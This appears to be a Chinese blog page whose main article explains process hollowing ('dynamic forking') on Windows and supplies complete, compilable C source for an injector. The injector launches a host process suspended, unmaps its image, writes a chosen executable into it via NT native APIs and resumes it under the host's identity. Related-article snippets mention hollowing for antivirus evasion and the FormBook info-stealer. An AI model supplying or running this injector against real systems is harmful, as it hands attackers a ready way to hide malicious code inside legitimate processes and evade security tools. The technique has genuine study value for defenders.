Dynamic forking (Process hollowing)

最新推荐文章于 2024-04-09 10:02:28 发布
最新推荐文章于 2024-04-09 10:02:28 发布
阅读量1.1k 收藏 1
点赞数
Dynamic forking (also known as process hollowing), is a technique that allow you to execute a executable image within another process's address space. It works by creating a host process in suspended state. Then the original executable image of the process is unmapped, and then memory is allocated in the process. The injector then write the replacement executable into the allocated memory, and the eax register of the process's primary thread is set to the entry point of the replacement executable.

How it works:

1) Create the host process in suspended state using CreateProcess function.

2) Get the context of the process's primary thread. The eax register is the entry point of the process's executable, and the ebx register is the address of the process's PEB.

3) Read the base address of process's executable from the PEB.

4) Read the replacement executable from disk.

5) Unmap the executable image using NtUnmapViewOfSection function.

6) Allocate memory in the host process.

7) Write the replacement executable into host process.

8) Write the new address of the executable into the PEB.

9) Set the eax register of primary thread to the entry point of replacement executable.

10) Resume the thread.

11) The replacement executable now runs in the address space of the host process, and the injector wait for the host process to terminate.

12) After the host process terminates, the injector exits.

Native API functions used:

1) NtUnmapViewOfSection
2) NtReadVirtualMemory
3) NtWriteVirtualMemory
4) NtGetContextThread
5) NtSetContextThread
6) NtResumeThread
7) NtWaitForSingleObject
8) NtClose
9) NtTerminateProcess

http://www.youtube.com/watch?v=G6AoZ5F4CH8

Source code 
#include <stdio.h>
#include <Windows.h>
#include <winternl.h>

#pragma comment(lib,"ntdll.lib")

EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
EXTERN_C NTSTATUS NTAPI NtGetContextThread(HANDLE,PCONTEXT);
EXTERN_C NTSTATUS NTAPI NtSetContextThread(HANDLE,PCONTEXT);
EXTERN_C NTSTATUS NTAPI NtUnmapViewOfSection(HANDLE,PVOID);
EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);

int main(int argc,char* argv[])
{
	PIMAGE_DOS_HEADER pIDH;
	PIMAGE_NT_HEADERS pINH;
	PIMAGE_SECTION_HEADER pISH;

	PVOID image,mem,base;
	DWORD i,read,nSizeOfFile;
	HANDLE hFile;

	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	CONTEXT ctx;

	ctx.ContextFlags=CONTEXT_FULL;

	memset(&si,0,sizeof(si));
	memset(&pi,0,sizeof(pi));

	if(argc!=3)
	{
		printf("\nUsage: [Target executable] [Replacement executable]\n");
		return 1;
	}

	printf("\nRunning the target executable.\n");

	if(!CreateProcess(NULL,argv[1],NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi)) // Start the target application
	{
		printf("\nError: Unable to run the target executable. CreateProcess failed with error %d\n",GetLastError());
		return 1;
	}

	printf("\nProcess created in suspended state.\n");

	printf("\nOpening the replacement executable.\n");

	hFile=CreateFile(argv[2],GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL); // Open the replacement executable

	if(hFile==INVALID_HANDLE_VALUE)
	{
		printf("\nError: Unable to open the replacement executable. CreateFile failed with error %d\n",GetLastError());

		NtTerminateProcess(pi.hProcess,1); // We failed, terminate the child process.
		return 1;
	}

	nSizeOfFile=GetFileSize(hFile,NULL); // Get the size of the replacement executable

	image=VirtualAlloc(NULL,nSizeOfFile,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate memory for the executable file

	if(!ReadFile(hFile,image,nSizeOfFile,&read,NULL)) // Read the executable file from disk
	{
		printf("\nError: Unable to read the replacement executable. ReadFile failed with error %d\n",GetLastError());

		NtTerminateProcess(pi.hProcess,1); // We failed, terminate the child process.
		return 1;
	}

	NtClose(hFile); // Close the file handle

	pIDH=(PIMAGE_DOS_HEADER)image;

	if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE) // Check for valid executable
	{
		printf("\nError: Invalid executable format.\n");
		NtTerminateProcess(pi.hProcess,1); // We failed, terminate the child process.
		return 1;
	}

	pINH=(PIMAGE_NT_HEADERS)((LPBYTE)image+pIDH->e_lfanew); // Get the address of the IMAGE_NT_HEADERS

	NtGetContextThread(pi.hThread,&ctx); // Get the thread context of the child process's primary thread
	NtReadVirtualMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&base,sizeof(PVOID),NULL); // Get the PEB address from the ebx register and read the base address of the executable image from the PEB

	if((DWORD)base==pINH->OptionalHeader.ImageBase) // If the original image has same base address as the replacement executable, unmap the original executable from the child process.
	{
		printf("\nUnmapping original executable image from child process. Address: %#x\n",base);
		NtUnmapViewOfSection(pi.hProcess,base); // Unmap the executable image using NtUnmapViewOfSection function
	}

	printf("\nAllocating memory in child process.\n");

	mem=VirtualAllocEx(pi.hProcess,(PVOID)pINH->OptionalHeader.ImageBase,pINH->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); // Allocate memory for the executable image

	if(!mem)
	{
		printf("\nError: Unable to allocate memory in child process. VirtualAllocEx failed with error %d\n",GetLastError());

		NtTerminateProcess(pi.hProcess,1); // We failed, terminate the child process.
		return 1;
	}

	printf("\nMemory allocated. Address: %#x\n",mem);

	printf("\nWriting executable image into child process.\n");

	NtWriteVirtualMemory(pi.hProcess,mem,image,pINH->OptionalHeader.SizeOfHeaders,NULL); // Write the header of the replacement executable into child process

	for(i=0;i<pINH->FileHeader.NumberOfSections;i++)
	{
		pISH=(PIMAGE_SECTION_HEADER)((LPBYTE)image+pIDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(i*sizeof(IMAGE_SECTION_HEADER)));
		NtWriteVirtualMemory(pi.hProcess,(PVOID)((LPBYTE)mem+pISH->VirtualAddress),(PVOID)((LPBYTE)image+pISH->PointerToRawData),pISH->SizeOfRawData,NULL); // Write the remaining sections of the replacement executable into child process
	}

	ctx.Eax=(DWORD)((LPBYTE)mem+pINH->OptionalHeader.AddressOfEntryPoint); // Set the eax register to the entry point of the injected image

	printf("\nNew entry point: %#x\n",ctx.Eax);

	NtWriteVirtualMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&pINH->OptionalHeader.ImageBase,sizeof(PVOID),NULL); // Write the base address of the injected image into the PEB

	printf("\nSetting the context of the child process's primary thread.\n");

	NtSetContextThread(pi.hThread,&ctx); // Set the thread context of the child process's primary thread

	printf("\nResuming child process's primary thread.\n");

	NtResumeThread(pi.hThread,NULL); // Resume the primary thread

	printf("\nThread resumed.\n");

	printf("\nWaiting for child process to terminate.\n");

	NtWaitForSingleObject(pi.hProcess,FALSE,NULL); // Wait for the child process to terminate

	printf("\nProcess terminated.\n");

	NtClose(pi.hThread); // Close the thread handle
	NtClose(pi.hProcess); // Close the process handle

	VirtualFree(image,0,MEM_RELEASE); // Free the allocated memory
	return 0;
}

gj333
关注
The Garden of Forking Paths:∗Observing Dynamic Parameters Distribution in Large Language Models
c_cpp_csharp的专栏
05-28 35
在理解NLP中Transformer架构的卓越性能背后的原因方面仍然存在很大差距。一个特别未探索的领域涉及训练过程中参数分布如何随时间演变的机制描述。在这项工作中,我们建议,观察模型参数统计分布的时间演变,特别是分叉效应,可以帮助理解模型质量,潜在地减少训练成本和评估工作,并从经验上展示权重稀疏化有效性背后的原因。
linux 系统进程管理工具systemd(systemctl命令、创建自己的systemd服务、单位类型Type=notify和Type=forking的区别)
西京刀客
12-11 3431
systemd是目前Linux系统上主要的系统守护进程管理工具,由于init一方面对于进程的管理是串行化的,容易出现阻塞情况,另一方面init也仅仅是执行启动脚本,并不能对服务本身进行更多的管理。所以从CentOS 7开始也由systemd取代了init作为默认的系统进程管理工具。
Process_hollowing_x64
Mccc_li的博客
12-19 232
#define _CRT_SECURE_NO_WARNINGS #include <windows.h> #pragma comment(lib,"ntdll.lib") EXTERN_C NTSTATUS NTAPI NtUnmapViewOfSection(HANDLE, PVOID); char* decrypt(const char* string, short shift) { size_t len = strlen(string); unsigned short
ProcessHollowing
04-27
Craft.io空洞 1. SectionRemapLoader SectionRemapLoader使用NtUnmapViewOfSection , NtCreateSection和NtMapViewOfSection来执行过程空心化。 这种方法要容易得多,但是需要磁盘上有一个有效的PE映像文件。 确保架构匹配。 SectionRemapLoader.exe以32位模式构建的SectionRemapLoader.exe启动32位进程,或以64位模式构建的SectionRemapLoader.exe启动64位进程。 Usage: SectionRemapLoader.exe <exe> <exe> [args...] 例子: $ .\SectionRemapLoader.exe C:\Windows\write.exe C:\Window
Process-Hollowing-master_processhollowing_
10-04
process hollowing master
探秘Process Hollowing:深度解析与应用指南
最新发布
gitblog_00061的博客
04-09 383
探秘Process Hollowing:深度解析与应用指南 去发现同类优质开源项目:https://gitcode.com/ 如果你是一位对Windows系统安全和逆向工程感兴趣的开发者或研究人员,那么这个项目绝对值得你的关注。这是一个开源库,它实现了在Windows平台上的一种高级注入技术——进程空壳化。本文将带你深入理解这一技术、其工作原理,并探讨其可能的应用场景。 项目简介 Process ...
vbs结束进程代码_借助ProcessHollowing和代码注入感染合法进程:信息窃取恶意软件FormBook分析...
weixin_39665787的博客
11-30 324
概述FormBook是一个信息窃取类型的恶意软件。与大多数其他信息窃取类恶意软件一样,它在部署到受害者的计算机上时,会执行许多操作来逃避反病毒厂商产品的检测。当然,正如我们在Ursnif、Hancitor、Dridex和其他木马中看到的那样,有许多变种可以通过多种方式接收Payload。在过去的一年中,威胁行为者最常用的分发FormBook恶意软件的方法是借助恶意钓鱼邮件并利用CVE-...
Dynamic Forking of Win32 EXE
10-31
动态载入运行Win32 EXE,也称为进程注入,是一种高级的系统编程技术,它允许程序在运行时动态地创建或注入其他可执行文件(EXE)到一个已存在的进程上下文中。这个过程通常涉及到操作系统的核心机制,如内存管理、...
Git工作流指南:Forking工作流
01-30
Forking工作流和前面讨论的几种工作流有根本的不同。这种工作流不是使用单个服务端仓库作为『中央』代码基线,而让各个开发者都有一个服务端仓库。这意味着各个代码贡献者有2个Git仓库而不是1个:一个本地私有的,另...
Git Forking工作流:安全协作的新模式
"Git工作流指南:Forking工作流" Git的Forking工作流是一种分布式版本控制系统中的协作模式,特别适用于大型、自发性或开源项目。与传统的集中式工作流不同,它不依赖单一的中央仓库,而是允许每个开发者拥有自己的...
NT API说明文档
06-18
/* * ntapi.h * * Windows NT Native API * * Most structures in this file is obtained from Windows NT/2000 Native API * Reference by Gary Nebbett, ISBN 1578701996. * * This file is part of the w32api package.
testng 无法注入service_从零起步揭秘如何构建Process Hollowing进程注入检测
weixin_39567013的博客
11-02 158
概述通常情况下,在对攻击活动进行检测的过程中,我们会遇到一些难以有效检测的攻击技术。我们是否找到或创建了攻击的概念证明(PoC)?我们是否已经掌握了攻击的底层技术?我们是否可以将威胁事件与恶意活动相关联以创建一些分析逻辑?有哪些特点会在所有的攻击中保持不变?有哪些是会发生变化的?所有上述这些,都是在研究一种攻击技术时通常会提出的问题。在这篇文章中,我将逐步使用称为“能力抽象”的技术,逐步剥离出使攻...
使用进程镂空技术免杀360Defender
u013797594的博客
05-05 4428
使用进程镂空技术免杀360Defender,免杀工具风暴免杀
[笔记]Windows核心编程《番外篇》常用的NT API及使用示例
二次元怪兽的博客
05-19 1478
文章目录前言NtQueryInformationProcess函数原型附录用例总结 前言 NTAPI:泛指ntdll.dll模块不对外提供的API接口 一般通过动态载入库的方式(LoadLibrary + GetProcAddress)调用 NtQueryInformationProcess NtQueryInformationProcess NtQueryInformationProcess用法 函数原型 NTSYSCALLAPI NTSTATUS NTAPI NtQueryInformationPro
Windows API 理解----Nt* Zw*
qq_42021840的博客
03-30 700
在你要理解Zw和Nt 系列API时,你首先要知道一点,那就是系统调用。什么是系统调用呢? 系统调用:操作系统为应用程序提供的可被调用的一组函数,也叫“System Call”。 从软件角度来看,这些系统调用都是操作系统为软件提供的服务,所以也称“系统服务”,也可以说两个名词是同名词。 系统调用所提供的服务都是在内核中实现的,而软件是在用户空间运行的,其实两者就是CP...
NTAPI的定义
赫的BLOG
10-24 3230
NTAPI的定义From WinNT.h #define NTAPI __stdcall
vc++ hook 拦截自己进程指定的api函数_自己动手制作一个过保护调试器
weixin_39908263的博客
11-26 1104
一、起因第一次接触驱动开发的小白,事情是这样的,一个星期前突发奇想想做一个腻o调试器保护程序用于调试游戏,既然要调试驱动保护的程序,自然也要深入驱动底层做调试器必须要hook api去隐藏调试器的参数 所以就有了今天这篇文章。二、准备的东西第一个版本的调试器保护程序就是今天要说的用到ETW(Event Tracing for Windows)hook 去Hook api 实现隐藏参数...
十种流行进程注入技术详细分析
weixin_34050389的博客
09-13 1091
本文讲的是十种流行进程注入技术详细分析, 前言 流程注入是一种恶意软件和无文件间谍攻击中使用的最为广泛的漏洞攻击技术,而且在攻击时还需要在另一个进程的地址空间内运行自定义代码。过程注入除了提高了攻击的隐蔽性之外,也实现了持久性攻击。尽管目前有许多流程注入技术,但在本文中,我只介绍十种在野外看到的能够运用另一个进程运行恶意代码的技术。在介绍的同时,我还会...
C++调用NTAPI枚举并强制关闭指定进程
热门推荐
Rprop
03-24 4万+
#include "../../RLib/RLib/native/RLib_Native.h" #pragma comment(lib, "ntdll.lib") Array *found_if_process_by_name(LPCWSTR name IN, LPCWSTR parent_name IN) { unsigned long bytes = 0; ManagedMemoryB
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值